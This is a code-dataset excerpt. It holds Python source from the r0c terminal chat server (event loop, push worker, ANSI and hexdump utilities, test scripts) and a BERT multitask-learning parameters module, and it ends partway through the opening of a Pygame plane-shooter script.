for c in srv.clients: if c.slowmo_tx or c.wizard_stage is not None: slow[c.socket] = c else: fast[c.socket] = c sc[c.socket] = c timeout = 0.2 if slow else 0.34 if fast else 69 want_tx = [s for s, c in fast.items() if c.writable()] want_rx = [s for s, c in sc.items() if c.readable()] want_rx += list(srvs.keys()) now = time.time() if slow and now >= next_slow: next_slow = now + 0.18 for c in slow.values(): if c.slowmo_skips: c.slowmo_skips -= 1 want_tx += [ s for s, c in slow.items() if c.writable() and not c.slowmo_skips ] try: rxs, txs, _ = select.select(want_rx, want_tx, [], timeout) if self.stopping: break with self.world.mutex: if sn != self.world.cserial: continue for s in rxs: if s in srvs: srvs[s].handle_accept() else: sc[s].handle_read() for s in txs: sc[s].handle_write() except Exception as ex: if "Bad file descriptor" in str(ex): # print('osx bug ignored') continue Util.whoops() def push_worker(self, world, ifaces): last_action_ts = time.time() last_its = None last_date = None while not self.shutdown_flag.is_set(): if any(srv.clients for srv
in self.servers): # sleep until the start of the next mod5 utc second while True: ts = time.time() its = int(ts / 5) * 5 if its != last_its: last_its = its break if ts - its < 4.99: if self.shutdown_flag.wait((5 - (ts - its))): break else: time.sleep(0.02) else: # less precision if there's nobody connected self.world.dirty_flag.wait(100) ts = time.time() last_its = int(ts / 5) * 5 with world.mutex: if self.stopping: break date = datetime.utcfromtimestamp(ts).strftime("%Y-%m-%d") if date != last_date: if last_date: world.broadcast_message( u"\033[36mday changed to \033[1m{0}".format(date), False ) last_date = date for iface in ifaces: for client in iface.clients: if client.handshake_sz: client.refresh(False) # print('next scheduled kick: {0}'.format('x' if iface.next_scheduled_kick is None else iface.next_scheduled_kick - ts)) if ( iface.next_scheduled_kick is not None and iface.next_scheduled_kick <= ts ): to_kick = [] next_min = None for sch in iface.scheduled_kicks: if sch[0] <= ts: to_kick.append(sch) else: if next_min is None or next_min > sch[0]: next_min = sch[0] for sch in to_kick: timeout, remote, msg = sch iface.scheduled_kicks.remove(sch) if remote in iface.clients: if msg is None: iface.part(remote) else: iface.part(remote, False) print(msg) iface.next_scheduled_kick = next_min if ts - last_action_ts >= 600: last_action_ts = ts # flush client configs for iface in ifaces: iface.save_configs() # flush wire logs if self.ar.log_rx or self.ar.log_tx: for client in iface.clients: if client.wire_log: try: client.wire_log.flush() except: Util.whoops() # flush chan logs for chan_list in [world.pub_ch, world.priv_ch]: for chan in chan_list: if chan.log_fh: try: chan.log_fh.flush() except: Util.whoops() print(" * terminated push_worker") def shutdown(self): # monitor_threads() self.stopping += 1 if self.stopping >= 3: os._exit(1) self.shutdown_flag.set() def signal_handler(self, sig, frame): if self.ar.thr_mon and not self.threadmon: self.threadmon = True Util.monitor_threads() else: self.shutdown() def start_r0c(argv): core = Core() try: if core.start(argv): return core.run() except SystemExit: raise except: Util.whoops() os._exit(1) def main(argv=None): mode = "normal" # mode = "profiler" # mode = 'test-ansi-annotation' # test_hexdump() if mode == "normal": if not start_r0c(argv): sys.exit(1) """ if mode == "profiler": print(" * PROFILER ENABLED") statfile = "profiler-results" import yappi yappi.start() start_r0c(argv) yappi.stop() fn_stats = yappi.get_func_stats() thr_stats = yappi.get_thread_stats() print() for ext in ["pstat", "callgrind", "ystat"]: print("writing {0}.{1}".format(statfile, ext)) fn_stats.save("{0}.{1}".format(statfile, ext), type=ext) with open("{0}.func".format(statfile), "w") as f: fn_stats.print_all(out=f) with open("{0}.thr".format(statfile), "w") as f: thr_stats.print_all(out=f) print("\n\n{0}\n func stats\n{0}\n".format("-" * 72)) fn_stats.print_all() print("\n\n{0}\n thread stats\n{0}\n".format("-" * 72)) thr_stats.print_all() if mode == "test-ansi-annotation": Util.test_ansi_annotation() """ if __name__ == "__main__": main() ``` #### File: r0c/r0c/util.py ```python from __future__ import print_function from .__init__ import EP, PY2, WINDOWS, COLORS, INTERP import traceback import threading import struct import time import sys import os import platform import itertools print_mutex = threading.Lock() if PY2: import __builtin__ as builtins else: import builtins HEX_WIDTH = 16 azAZ = u"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" BRI_256 = list( 
itertools.chain( range(35, 47), range(48, 52), range(70, 88), range(103, 124), range(132, 232), ) ) def print(*args, **kwargs): args = list(args) try: if not COLORS and u"\033" in args[0]: args[0] = strip_ansi(args[0]) except: pass with print_mutex: t = time.strftime("%H%M%S ") builtins.print( t + str(args[0] if args else u"").replace(u"\n", u"\n" + t), *args[1:], **kwargs ) def num(c): try: return int(c) except: return None def b2hex(data): if PY2: return " ".join(map(lambda b: format(ord(b), "02x"), data)) else: if type(data) is str: return " ".join(map(lambda b: format(ord(b), "02x"), data)) else: return " ".join(map(lambda b: format(b, "02x"), data)) def hexdump(pk, prefix="", file=None): if file is not None: line_fmt = u"{0} {2}{3}{4}" hex_width = 4 blk_width = 4 else: line_fmt = u"{0}{1:8x} {2}{3} {4}" hex_width = HEX_WIDTH blk_width = 8 lpk = len(pk) ofs = 0 hexofs = 0 hexlen = 0 hexstr = "" ascstr = "" ascstr_width = int(hex_width * 100 / 32.0 - 0.5) # 32h = 100a, 16h = 50a while ofs < lpk: hexstr += b2hex(pk[ofs : ofs + blk_width]) hexstr += " " if PY2: ascstr += "".join( map( lambda b: b if ord(b) >= 0x20 and ord(b) < 0x7F else ".", pk[ofs : ofs + blk_width], ) ) else: ascstr += "".join( map( lambda b: chr(b) if b >= 0x20 and b < 0x7F else ".", pk[ofs : ofs + blk_width], ) ) hexlen += blk_width ofs += blk_width if hexlen >= hex_width or ofs >= lpk: txt = line_fmt.format( prefix, hexofs, hexstr, u" " * (ascstr_width - len(hexstr)), ascstr ) if file is not None: file.write((txt + u"\n").encode("utf-8")) else: print(txt) hexofs = ofs hexstr = "" hexlen = 0 ascstr = "" else: hexstr += " " ascstr += " " def test_hexdump(): try: from StringIO import StringIO as bio except: from io import BytesIO as bio v = b"" for n in range(5): print() v += b"a" fobj = bio() hexdump(v, ">", fobj) print(fobj.getvalue().decode("utf-8").rstrip("\n") + "$") fobj.close() v = b"" for n in range(18): print() v += b"a" hexdump(v, ">") sys.exit(0) def trunc(txt, maxlen): eoc = azAZ ret = u"" clen = 0 pend = None counting = True for input_ofs, ch in enumerate(txt): # escape sequences can never contain ESC; # treat pend as regular text if so if ch == u"\033" and pend: clen += len(pend) ret += pend counting = True pend = None if not counting: ret += ch if ch in eoc: counting = True else: if pend: pend += ch if pend.startswith(u"\033["): counting = False else: clen += len(pend) counting = True ret += pend pend = None else: if ch == u"\033": pend = u"{0}".format(ch) else: ret += ch clen += 1 if clen >= maxlen: return [ret, txt[input_ofs:]] return [ret, u""] # adapted from trunc def strip_ansi(txt): eoc = azAZ ret = u"" pend = None counting = True for ch in txt: # escape sequences can never contain ESC; # treat pend as regular text if so if ch == u"\033" and pend: ret += pend counting = True pend = None if not counting: if ch in eoc: counting = True else: if pend: pend += ch if pend.startswith(u"\033["): counting = False else: ret += pend counting = True pend = None else: if ch == u"\033": pend = u"{0}".format(ch) else: ret += ch return ret # adapted from trunc def visual_length(txt): eoc = azAZ clen = 0 pend = None counting = True for ch in txt: # escape sequences can never contain ESC; # treat pend as regular text if so if ch == u"\033" and pend: clen += len(pend) counting = True pend = None if not counting: if ch in eoc: counting = True else: if pend: pend += ch if pend.startswith(u"\033["): counting = False else: clen += len(pend) counting = True pend = None else: if ch == u"\033": pend = u"{0}".format(ch) else: 
co = ord(ch) # the safe parts of latin1 and cp437 (no greek stuff) if ( co < 0x100 # ascii + lower half of latin1 or (co >= 0x2500 and co <= 0x25A0) # box drawings or (co >= 0x2800 and co <= 0x28FF) # braille ): clen += 1 else: # assume moonrunes or other double-width clen += 2 return clen # 83% the speed of visual_length, # good enough to stop maintaining it and swap w/ len(this) def visual_indices(txt): eoc = azAZ ret = [] pend_txt = None pend_ofs = [] counting = True for n, ch in enumerate(txt): # escape sequences can never contain ESC; # treat pend as regular text if so if ch == u"\033" and pend_txt: ret.extend(pend_ofs) counting = True pend_txt = None pend_ofs = [] if not counting: if ch in eoc: counting = True else: if pend_txt: pend_txt += ch pend_ofs.append(n) if pend_txt.startswith(u"\033["): counting = False else: ret.extend(pend_ofs) counting = True pend_txt = None pend_ofs = [] else: if ch == u"\033": pend_txt = u"{0}".format(ch) pend_ofs = [n] else: ret.append(n) return ret def sanitize_ctl_codes(aside): plain = u"" for pch in aside: nch = ord(pch) # print('read_cb inner {0} / {1}'.format(b2hex(pch.encode('utf-8', 'backslashreplace')), nch)) if nch < 0x20 and nch != 0x0B and nch != 0x0F: print("substituting non-printable \\x{0:02x}".format(nch)) plain += u"?" else: plain += pch return plain def sanitize_fn(fn): for bad, good in [ [u"<", u"<"], [u">", u">"], [u":", u":"], [u'"', u"""], [u"/", u"/"], [u"\\", u"\"], [u"|", u"|"], [u"?", u"?"], [u"*", u"*"], [u"'", u"'"], # shell-safety [u"`", u"`"], # shell-safety ]: fn = fn.replace(bad, good) if WINDOWS: bad = [u"con", u"prn", u"aux", u"nul"] for n in range(1, 10): bad += u"com{0} lpt{0}".format(n).split(u" ") if fn.lower() in bad: fn = u"_" + fn return fn FOREGROUNDS = {} for luma, chars in enumerate([u"01234567", u"89abcdef"]): for n, ch in enumerate(chars): FOREGROUNDS[ch] = u"\033[{0};3{1}".format(luma, n) BACKGROUNDS = {} for n, ch in enumerate(u"01234567"): BACKGROUNDS[ch] = u";4{0}".format(n) def convert_color_codes(txt, preview=False): foregrounds = FOREGROUNDS backgrounds = BACKGROUNDS scan_from = 0 while txt: ofs = txt.find(u"\x0b", scan_from) if ofs < 0: break scan_from = ofs + 1 fg = None if len(txt) > ofs + 1: fg = txt[ofs + 1] bg = None if len(txt) > ofs + 3 and txt[ofs + 2] == u",": bg = txt[ofs + 3] if fg in foregrounds: fg = foregrounds[fg] else: fg = None bg = None # can't set bg without valid fg if bg in backgrounds: bg = backgrounds[bg] else: bg = None resume_txt = ofs + 1 if fg: resume_txt += 1 scan_from = len(fg) + 1 if bg: resume_txt += 2 scan_from += len(bg) preview_k = u"" if preview: resume_txt = ofs + 1 if fg: preview_k = u"K" if fg and bg: txt = u"{0}{1}{2}m{3}{4}".format( txt[:ofs], fg, bg, preview_k, txt[resume_txt:] ) elif fg: txt = u"{0}{1}m{2}{3}".format(txt[:ofs], fg, preview_k, txt[resume_txt:]) else: txt = u"{0}K{1}".format(txt[:ofs], txt[resume_txt:]) scan_from = 0 while txt: ofs = txt.find(u"\x0f", scan_from) if ofs < 0: break scan_from = ofs + 1 txt = u"{0}\033[0m{2}{1}".format( txt[:ofs], txt[scan_from:], u"O" if preview else u"" ) return txt # B35_CHARS = tuple(u'0123456789abcdefghijkmnopqrstuvwxyz') B35_CHARS = tuple(u"abcdefghijkmnopqrstuvwxyz") B35_ATLAS = dict((c, i) for i, c in enumerate(B35_CHARS)) B35_BASE = len(B35_CHARS) def b35enc(number): if not number: return B35_CHARS[0] prefix = u"" if number < 0: prefix = u"-" number = abs(number) ret = u"" while number: number, rem = divmod(number, B35_BASE) ret = B35_CHARS[rem] + ret return prefix + ret def b35dec(b35str): factor = 1 if 
b35str.startswith(u"-"): b35str = b35str[1:] factor = -1 ret = 0 for c in b35str: ret = ret * B35_BASE + B35_ATLAS[c] return factor * ret def visualize_all_unicode_codepoints_as_utf8(): stats = [0] * 256 nmax = sys.maxunicode + 1 print("collecting all codepoints until {0}d, 0x{1:x}".format(nmax, nmax)) if PY2: to_unicode = unichr # noqa: F821 from_char = ord else: to_unicode = chr from_char = int for n in range(nmax): if n % 0x10000 == 0: print( "at codepoint {0:6x} of {1:6x}, {2:5.2f}%".format( n, nmax, (100.0 * n) / nmax ) ) ch = to_unicode(n) try: bs = ch.encode("utf-8") except: # python2 allows encoding ud800 as \xed\xa0\x80 which is an illegal sequence in utf8; # python -c "for x in unichr(0xd800).encode('utf-8'): print '{0:2x}'.format(ord(x))" continue for b in bs: stats[from_char(b)] += 1 print() for i, n in enumerate(stats): v = n if v == 0: v = "illegal value" elif v == 1: v = "single-use value" print("byte 0x{0:2x} occurences: {1}".format(i, v)) print() # visualize_all_unicode_codepoints_as_utf8() def wrap(txt, maxlen, maxlen2): words = txt.rstrip().split() ret = [] for word in words: if len(word) * 2 < maxlen or visual_length(word) < maxlen: ret.append(word) else: while visual_length(word) >= maxlen: ret.append(word[: maxlen - 1] + u"-") word = word[maxlen - 1 :] if word: ret.append(word) words = ret ret = [] ln = u"" spent = 0 for word in words: wl = visual_length(word) if spent + wl > maxlen: ret.append(ln[1:]) maxlen = maxlen2 spent = 0 ln = u"" ln += u" " + word spent += wl + 1 if ln: ret.append(ln[1:]) return ret def whoops(extra=None): msg = r""" __ _ __/ /_ ____ ____ ____ _____ | | /| / / __ \/ __ \/ __ \/ __ \/ ___/ | |/ |/ / / / / /_/ / /_/ / /_/ (__ ) |__/|__/_/ /_/\____/\____/ .___/____/ /_/""" exc = traceback.format_exc() if exc.startswith("None"): exc = "".join(traceback.format_stack()[:-1]) msg = "{0}\r\n{1}\r\n{2}</stack>".format(msg[1:], exc.rstrip(), "-" * 64) print(msg) if extra: print(" {0}\n{1}\n".format(extra, "-" * 64)) def t_a_a_bt(): ret = [] for tid, stack in sys._current_frames().items(): ret.append(u"\r\nThread {0} {1}".format(tid, "=" * 64)) for fn, lno, func, line in traceback.extract_stack(stack): ret.append(u' File "{0}", line {1}, in {2}'.format(fn, lno, func)) if line: ret.append(u" {0}".format(line.strip())) return u"\r\n".join(ret) thread_monitor_enabled = False def monitor_threads(): global thread_monitor_enabled if thread_monitor_enabled: return thread_monitor_enabled = True def stack_collector(): while True: print("capturing stack") time.sleep(5) txt = t_a_a_bt() with open("r0c.stack", "wb") as f: f.write(txt.encode("utf-8")) thr = threading.Thread(target=stack_collector, name="stk_col") thr.daemon = True thr.start() def host_os(): py_ver = ".".join([str(x) for x in sys.version_info]) ofs = py_ver.find(".final.") if ofs > 0: py_ver = py_ver[:ofs] bitness = struct.calcsize("P") * 8 host_os = platform.system() return "{0} on {1}{2}".format(py_ver, host_os, bitness) def compat_chans_in_root(): bad_dirs = [] good_dirs = ["pm", "chan", "wire"] for (dirpath, dirnames, filenames) in os.walk(EP.log): for d in dirnames: if d not in good_dirs: bad_dirs.append(d) break if bad_dirs: print() print("== performing upgrade in 5 seconds ==") print() print("Will move the following directories from [log] to [log/chan]:") print(", ".join(bad_dirs)) print() print("PRESS CTRL-C TO ABORT") for n in range(5): print("{0} ...".format(5 - n)) time.sleep(1) for d in bad_dirs: os.rename("{0}{1}".format(EP.log, d), "{0}chan/{1}".format(EP.log, d)) print("upgrade done 
\\o/") print() def py26_threading_event_wait(event): """ threading.Event.wait() is broken on py2.6; with multiple subscribers it doesn't always trigger """ if ( sys.version_info[:2] != (2, 6) or INTERP != "CPython" or "_Event__flag" not in event.__dict__ ): return def nice_meme(timeout=None): if event._Event__flag: return True time.sleep(0.2) return event._Event__flag event.wait = nice_meme """ # --------------------------------------------------------------------- # dumping ground for mostly useless code below def test_ansi_annotation(): rangetype = range try: rangetype = xrange # noqa: F405,F821 except: pass ansi_txt = ( "\033[1;33mHello \033[1;32mWorld\033[0m! This \033[7mis\033[0m a test.\033[A" ) ansi_txt = "\033[mf\033[s\033[w\033[has\033[3451431613gt\033[m \033[s\033[g\033[s\033[g\033[s\033[gcod\033[me\033[x" rv = visual_indices(ansi_txt) print(" ".join(ansi_txt.replace("\033", "*"))) print(" ".join([str(x % 10) for x in rangetype(len(ansi_txt))])) print(" ".join([str(x) for x in rv])) print("{0} {1}".format(visual_length(ansi_txt), len(rv))) visual = "" for ofs in rv: visual += ansi_txt[ofs] print("[{0}]".format(visual)) for outer_n in rangetype(3): t0 = time.time() for n in rangetype(100000): rv = visual_indices(ansi_txt) print(str(time.time() - t0)) t0 = time.time() for n in rangetype(100000): rv = visual_length(ansi_txt) print(str(time.time() - t0)) """ ``` #### File: test/analysis/resample-log.py ```python from __future__ import print_function NUM_INPUT_COLS = 4 import re import sys def eprint(*args, **kwargs): kwargs["file"] = sys.stderr print(*args, **kwargs) if len(sys.argv) < 2: eprint("need argument 1: graph to resample+derive") sys.exit(1) fn = sys.argv[1] # 1516048842.772 j 3324 p 3301 m 220488 d 168,167,9966 fmt_in = re.compile( r"^[0-9]{6} ([0-9\.]+) j ([0-9]+) p ([0-9]+) m ([0-9]+) d ([0-9]+),([0-9]+),([0-9]+)$" ) rows = [] with open(fn, "rb") as f: for ln in f: m = fmt_in.match(ln.decode("utf-8").strip()) if not m: continue rows.append([float(x) for x in m.groups()]) n = -1 rows2 = [] for r2, r in zip(rows[:-1], rows[1:]): n += 1 diff = 0 for col in range(NUM_INPUT_COLS): if r[col] - r2[col] > 10: rows2 = rows[n:] if rows2: break rows = rows2 if not rows: eprint("\n\n too slow my dude\n") sys.exit(1) def resample(rows): ret = [] for r2, r in zip(rows[:-1], rows[1:]): r2 = r2[:NUM_INPUT_COLS] r = r[:NUM_INPUT_COLS] # difference between r2 and r rd = [] for v2, v in zip(r2, r): rd.append(v - v2) # extract timestamp ts2 = r2[0] ts = r[0] its2 = int(ts2) its = int(ts) # skip row if timestamp floors to the same if its2 == its: continue # all whole seconds between r2 and r for isec in range(its2 + 1, its + 1): # eprint() # eprint('r2: ' + ''.join('{0} '.format(x) for x in r2)) # eprint('r: ' + ''.join('{0} '.format(x) for x in r)) # eprint('rd: ' + ''.join('{0} '.format(x) for x in rd)) # eprint('isec {0} [{1}..{2}]'.format(isec, its2+1, its+1)) row = [] mul = (isec * 1.0 - ts2) / (ts * 1.0 - ts2) for n, rv in enumerate(r): row.append(r2[n] + (rv - r2[n]) * mul) # eprint('ri: ' + ''.join('{0} '.format(x) for x in row)) ret.append(row) return ret def derivate(rows): ret = [] for r2, r in zip(rows[:-1], rows[1:]): rd = [r2[0]] for v2, v in zip(r2[1:], r[1:]): rd.append(v - v2) ret.append(rd) return ret rows = resample(rows) rows = derivate(rows) if not rows: eprint("parsing failed") sys.exit(1) # start counting time from 0 epoch = round(rows[0][0]) for n in range(len(rows)): rows[n][0] = int(round(rows[n][0]) - epoch) for row in rows: print("{0:<6d} {1:8.2f} {2:8.2f} 
{3:8.2f}".format(*row)) ``` #### File: test/prototyping/list-perf.py ```python import time t0 = 0 def td(msg): global t0 t1 = time.time() print("{0} {1:.6f} {2}\n".format(t1, t1 - t0, msg)) t0 = t1 class Foo(object): def __init__(self, n): self.n = n self.v2 = int(n * 1.3) td("started") n_mb = 24 haystack = [] needle = None needle_at = int(n_mb * 1024 * 1024 * 0.74) for n1 in range(n_mb): print(n_mb, n1) for n2 in range(1024): for n3 in range(1024): n = (n1 * 1024 + n2) * 1024 + n3 haystack.append(Foo(n)) if n == needle_at: needle = haystack[-1] td("built list") # print(haystack.index(needle)) # td('find needle') print(haystack[needle_at]) td("get abs pos needle") print(haystack[int(0.31 * n_mb * 1024 * 1024)]) td("get abs pos other") # py2 58.6% ram # 1515537393.86 25.088947 built list # 1515537394.18 0.313340 find needle # 1515537394.18 0.000040 get abs pos # py3 31.7% ram # 1515537445.5261745 21.067613 built list # 1515537445.7479792 0.221805 find needle # 1515537445.7480137 0.000035 get abs pos # ^ without v2 member # | # v with v2 member # py2 62.3% ram # 1515537643.67 29.696990 built list # 1515537643.67 0.000044 get abs pos needle # 1515537643.67 0.000017 get abs pos other # py3 36.5% ram # 1515537590.0602984 27.699614 built list # 1515537590.0603702 0.000072 get abs pos needle # 1515537590.060382 0.000012 get abs pos other ```
{ "source": "90217/bert-multitask-learning", "score": 2 }
#### File: bert-multitask-learning/bert_multitask_learning/params.py ```python import os import re import json import shutil from .modeling import BertConfig from . import data_preprocessing from .utils import create_path, EOS_TOKEN, get_or_make_label_encoder class BaseParams(): def __init__(self): self.run_problem_list = [] self.problem_type = { 'weibo_ner': 'seq_tag', 'weibo_fake_cls': 'cls', 'weibo_cws': 'seq_tag', 'weibo_pretrain': 'pretrain', 'cws': 'seq_tag', 'NER': 'seq_tag', 'ctb_pos': 'seq_tag', 'ctb_cws': 'seq_tag', 'as_cws': 'seq_tag', 'msr_cws': 'seq_tag', 'pku_cws': 'seq_tag', 'city_cws': 'seq_tag', 'boson_ner': 'seq_tag', 'msra_ner': 'seq_tag', 'POS': 'seq_tag', 'weibo_fake_seq2seq_tag': 'seq2seq_tag', 'weibo_fake_seq_tag': 'seq_tag', 'ontonotes_ner': 'seq_tag', 'ontonotes_cws': 'seq_tag', 'ontonotes_chunk': 'seq2seq_tag', 'boson_domain': 'cls', 'Weibo_domain': 'cls', 'msra_domain': 'cls', 'as_domain': 'cls', 'msr_domain': 'cls', 'pku_domain': 'cls', 'cityu_domain': 'cls', 'emotion_analysis': 'cls', 'ontonotes_pos': 'seq_tag' } # specifying this will make the key reuse the value's top layer # that is, the weibo_ner problem will use NER's top self.share_top = { 'ctb_cws': 'cws', 'as_cws': 'cws', 'msr_cws': 'cws', 'pku_cws': 'cws', 'city_cws': 'cws', 'ctb_pos': 'POS', 'boson_domain': 'ner_domain', 'Weibo_domain': 'ner_domain', 'msra_domain': 'ner_domain', 'as_domain': 'cws_domain', 'msr_domain': 'cws_domain', 'pku_domain': 'cws_domain', 'cityu_domain': 'cws_domain' } for p in self.problem_type: if p not in self.share_top: self.share_top[p] = p self.multitask_balance_type = 'data_balanced' # self.multitask_balance_type = 'problem_balanced' # logging control self.log_every_n_steps = 100 self.detail_log = True self.multiprocess = True self.decode_vocab_file = None self.eval_throttle_secs = 600 # training self.init_lr = 2e-5 self.batch_size = 32 self.train_epoch = 15 self.freeze_step = 0 self.prefetch = 5000 self.dynamic_padding = True self.bucket_batch_sizes = [32, 32, 32, 16] self.bucket_boundaries = [30, 64, 128] # hparams self.dropout_keep_prob = 0.9 self.max_seq_len = 256 self.use_one_hot_embeddings = True self.label_smoothing = 0.0 self.crf = False self.bert_num_hidden_layer = 12 self.hidden_dense = False # seq2seq self.decoder_num_hidden_layers = 3 self.beam_size = 10 self.init_decoder_from_encoder = False self.beam_search_alpha = 0.6 self.decode_max_seq_len = 90 # multitask training self.label_transfer = False self.augument_mask_lm = False self.augument_rate = 0.5 self.distillation = False # deprecated since results were not good # self.mutual_prediction = False self.grid_transformer = False self.task_transformer = False self.mean_gradients = False # randomly replace punctuation with some probability to # ease the punctuation-sensitivity problem self.punc_replace_prob = 0.0 self.punc_list = list(',.!?!。?,、') self.hidden_gru = False self.label_transfer_gru = False # if None, we will use the same hidden_size as inputs # e.g. 
# of labels self.label_transfer_gru_hidden_size = None # bert config self.init_checkpoint = 'chinese_L-12_H-768_A-12' # pretrain hparams self.dupe_factor = 10 self.short_seq_prob = 0.1 self.masked_lm_prob = 0.15 self.max_predictions_per_seq = 20 self.mask_lm_hidden_size = 768 self.mask_lm_hidden_act = 'gelu' self.mask_lm_initializer_range = 0.02 self.train_problem = None self.tmp_file_dir = 'tmp' # get generator function for each problem self.read_data_fn = {} for problem in self.problem_type: try: self.read_data_fn[problem] = getattr( data_preprocessing, problem) except AttributeError: raise AttributeError( '%s function not implemented in data_preprocessing.py' % problem) self.problem_assigned = False def add_problem(self, problem_name, problem_type='cls', processing_fn=None, share_top=None): if problem_type not in ['cls', 'seq_tag', 'seq2seq_tag', 'seq2seq_text', 'multi_cls']: raise ValueError('Provided problem type not valid, expect {0}, got {1}'.format( ['cls', 'seq_tag', 'seq2seq_tag', 'seq2seq_text', 'multi_cls'], problem_type)) self.problem_type[problem_name] = problem_type self.read_data_fn[problem_name] = processing_fn if share_top is not None: self.share_top[problem_name] = share_top else: self.share_top[problem_name] = problem_name def assign_problem(self, flag_string: str, gpu=2, base_dir=None, dir_name=None, is_serve=False): """Assign the actual run problem to param. This function will do the following things: 1. parse the flag string to form the run_problem_list 2. create checkpoint saving path 3. calculate total number of training data and training steps 4. scale the learning rate linearly with the number of gpus Arguments: flag_string {str} -- run problem string example: cws|POS|weibo_ner&weibo_cws Keyword Arguments: gpu {int} -- number of gpus used for training, this will affect the training steps and learning rate (default: {2}) base_dir {str} -- base dir for ckpt, if None, then "models" is assigned (default: {None}) dir_name {str} -- dir name for ckpt, if None, will be created automatically (default: {None}) """ self.problem_assigned = True self.is_serve = is_serve self.problem_list = self.parse_problem_string(flag_string) # create dir and get vocab, config self.prepare_dir(base_dir, dir_name, self.problem_list) self.get_data_info(self.problem_list, self.ckpt_dir) if not is_serve: self.shuffle_buffer = min([200000, self.data_num]) for problem in self.problem_list: if self.problem_type[problem] == 'pretrain': dup_fac = self.dupe_factor break else: dup_fac = 1 self.train_steps = int(( self.data_num * self.train_epoch * dup_fac) / (self.batch_size*max(1, gpu))) self.num_warmup_steps = int(0.1 * self.train_steps) # linearly scale the learning rate self.lr = self.init_lr * gpu def to_json(self): dump_dict = {} for att_name, att in vars(self).items(): try: json.dumps(att) dump_dict[att_name] = att except TypeError: pass with open(self.params_path, 'w', encoding='utf8') as f: json.dump(dump_dict, f) def from_json(self, json_path=None): params_path = json_path if json_path is not None else self.params_path with open(params_path, 'r', encoding='utf8') as f: dump_dict = json.load(f) for att in dump_dict: setattr(self, att, dump_dict[att]) self.bert_config = BertConfig.from_dict(self.bert_config_dict) self.bert_config.num_hidden_layers = dump_dict['bert_num_hidden_layer'] def get_data_info(self, problem_list, base): '''Get number of data, number of classes of data and eos_id of data. 
Arguments: problem_list {list} -- problem list base {str} -- path to store data_info.json ''' json_path = os.path.join(base, 'data_info.json') if os.path.exists(json_path): data_info = json.load(open(json_path, 'r', encoding='utf8')) self.data_num_dict = data_info['data_num'] self.num_classes = data_info['num_classes'] self.eos_id = data_info['eos_id'] else: self.data_num_dict = {} self.num_classes = {} self.eos_id = {} if not self.is_serve: # update data_num and train_steps self.data_num = 0 for problem in problem_list: if problem not in self.data_num_dict or self.multiprocess: self.data_num_dict[problem] = len( list(self.read_data_fn[problem](self, 'train'))) self.data_num += self.data_num_dict[problem] else: self.data_num += self.data_num_dict[problem] data_info = { 'data_num': self.data_num_dict, 'num_classes': self.num_classes, 'eos_id': self.eos_id } json.dump(data_info, open(json_path, 'w', encoding='utf8')) return json_path def parse_problem_string(self, flag_string): '''Parse problem string Example: cws|POS|weibo_ner&weibo_cws self.run_problem_list = [{cws:seq_tag}, {POS:seq_tag}, {weibo_ner:seq_tag, weibo_cws:seq_tag}] problem_list = [cws, POS, weibo_ner, weibo_cws] Arguments: flag_string {str} -- problem string Returns: list -- problem list ''' self.problem_str = flag_string # Parse problem string self.run_problem_list = [] for flag_chunk in flag_string.split('|'): if '&' not in flag_chunk: problem_type = {} problem_type[flag_chunk] = self.problem_type[flag_chunk] self.run_problem_list.append(problem_type) else: problem_type = {} for problem in flag_chunk.split('&'): problem_type[problem] = self.problem_type[problem] self.run_problem_list.append(problem_type) # if (self.label_transfer or self.mutual_prediction) and self.train_problem is None: if self.train_problem is None: self.train_problem = [p for p in self.run_problem_list] problem_list = sorted(re.split(r'[&|]', flag_string)) return problem_list def prepare_dir(self, base_dir, dir_name, problem_list): base = base_dir if base_dir is not None else 'models' dir_name = dir_name if dir_name is not None else '_'.join( problem_list)+'_ckpt' self.ckpt_dir = os.path.join(base, dir_name) if not self.is_serve: create_path(self.ckpt_dir) self.params_path = os.path.join(self.ckpt_dir, 'params.json') try: shutil.copy2(os.path.join(self.init_checkpoint, 'vocab.txt'), self.ckpt_dir) shutil.copy2(os.path.join(self.init_checkpoint, 'bert_config.json'), self.ckpt_dir) except FileNotFoundError: pass self.vocab_file = os.path.join(self.ckpt_dir, 'vocab.txt') self.bert_config = BertConfig.from_json_file( os.path.join(self.ckpt_dir, 'bert_config.json')) self.bert_config.num_hidden_layers = self.bert_num_hidden_layer self.bert_config_dict = self.bert_config.__dict__ with open(self.vocab_file, 'r', encoding='utf8') as vf: self.vocab_size = len(vf.readlines()) class CRFParams(BaseParams): def __init__(self): super(CRFParams, self).__init__() self.crf = True class StaticBatchParams(BaseParams): def __init__(self): super(StaticBatchParams, self).__init__() self.dynamic_padding = False class DynamicBatchSizeParams(BaseParams): def __init__(self): super(DynamicBatchSizeParams, self).__init__() self.bucket_batch_sizes = [128, 64, 32, 16] ```
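parse_problem_string above encodes the run configuration in a tiny grammar: '|' separates chunks that run as separate tasks, while '&' groups problems trained jointly within a chunk. A self-contained sketch of just that parsing step (the problem-type table is a trimmed example):

```python
import re

def parse_flag_string(flag_string, problem_type):
    # "cws|POS|weibo_ner&weibo_cws" ->
    # [{'cws': 'seq_tag'}, {'POS': 'seq_tag'},
    #  {'weibo_ner': 'seq_tag', 'weibo_cws': 'seq_tag'}]
    run_problem_list = [
        {p: problem_type[p] for p in chunk.split('&')}
        for chunk in flag_string.split('|')
    ]
    # flat, sorted list of every problem mentioned
    problem_list = sorted(re.split(r'[&|]', flag_string))
    return run_problem_list, problem_list

types = {'cws': 'seq_tag', 'POS': 'seq_tag',
         'weibo_ner': 'seq_tag', 'weibo_cws': 'seq_tag'}
runs, problems = parse_flag_string('cws|POS|weibo_ner&weibo_cws', types)
```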
{ "source": "90327/Pygame", "score": 3 }
#### File: 90327/Pygame/main.py ```python import sys import time import traceback import pygame.mixer from pygame.locals import * import bullet import enemyplan import myplan import supply from enemyplan import * # initialization pygame.init() pygame.mixer.init() # create the clock object that caps the frame rate clock = pygame.time.Clock() # set the screen size size = width, height = 512, 900 screen = pygame.display.set_mode(size) # set the window title pygame.display.set_caption('TylerXixi ------------Modern Plane Battle------------') # load images # background image background = pygame.image.load('image\\background\\1.jpg').convert_alpha() # game icon (ICO) ico = pygame.image.load('image\\ICO\\J20.ico') pygame.display.set_icon(ico) # images shown while paused people_pause_image = pygame.image.load('image\\Pause\\j20_gaitubao_656x464.png').convert_alpha() font_image = pygame.image.load('image\\Pause\\font22.png').convert_alpha() # load game sounds # main background music pygame.mixer.music.load('Wav\\back music\\backmusci.mp3') pygame.mixer.music.set_volume(0.03) # background music once level 4 is reached level4_backmusic = 